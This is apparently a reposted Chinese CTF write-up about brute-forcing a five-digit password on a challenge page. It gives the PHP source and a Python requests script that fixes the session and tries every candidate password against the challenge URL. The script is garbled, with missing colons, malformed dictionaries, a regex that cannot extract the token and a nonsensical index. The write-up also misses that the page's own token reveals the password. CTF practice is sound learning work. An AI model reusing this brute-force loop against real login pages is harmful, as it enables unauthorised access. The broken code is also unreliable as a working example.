GJCTF模擬題之python暴力破解網站管理員密碼
阿新 • • 發佈:2018-11-20
題目地址:http://www.czlgjbbq.top/GJCTF/brute.php
php原始碼:
<?php error_reporting(0); session_start(); if(empty($_COOKIE['f14g']) || empty($_SESSION['token'])){ $rand_number = rand(10000,99999); setcookie('f14g',1); $_SESSION['token'] = base64_encode(base64_encode($rand_number)); } echo "當前session值:".$_SESSION['token']; ?> <html> <head><title>你能進來嗎?</title></head> <body> <form action="./brute.php" method="GET"> <input type="text" name="password" placeholder="請輸入五位數密碼!" value=""> <input type="hidden" name="check" value="<?php echo $_SESSION['token'];?>"> <input type="submit" name="submit" value="提交"> </form> </body> </html> <?php if($_SESSION['token'] == $_GET['check']){ $password = $_GET['password']; echo $password; if($password == base64_decode(base64_decode($_SESSION['token']))){ echo "flag:GJCTF{anjjPONFAkg};"; }else{ echo "error!"; } }else{ echo "session error!"; } ?>
根據原始碼可以看出我們可以固定session值來避免session值的重新整理從而避免密碼的變更。
所以這裡我們使用python指令碼,並使用requests.session庫來避免session值的重新整理以導致後臺管理員密碼的重新整理。
python指令碼:
import requests import re s = requests.session() html = s.get('http://www.czlgjbbq.top/GJCTF/brute.php') pattern = '.html' ss = re.search(pattern, html.text) session = ss.group()[1-6] #print session for i in range(10000,99999) payload = {'password' str(i), 'check' session} #print payload html = s.get(url='http://www.czlgjbbq.top/GJCTF/brute.php', params=payload) pattern = 'GJCTF' if not re.match(pattern,html.text) pass else print html.text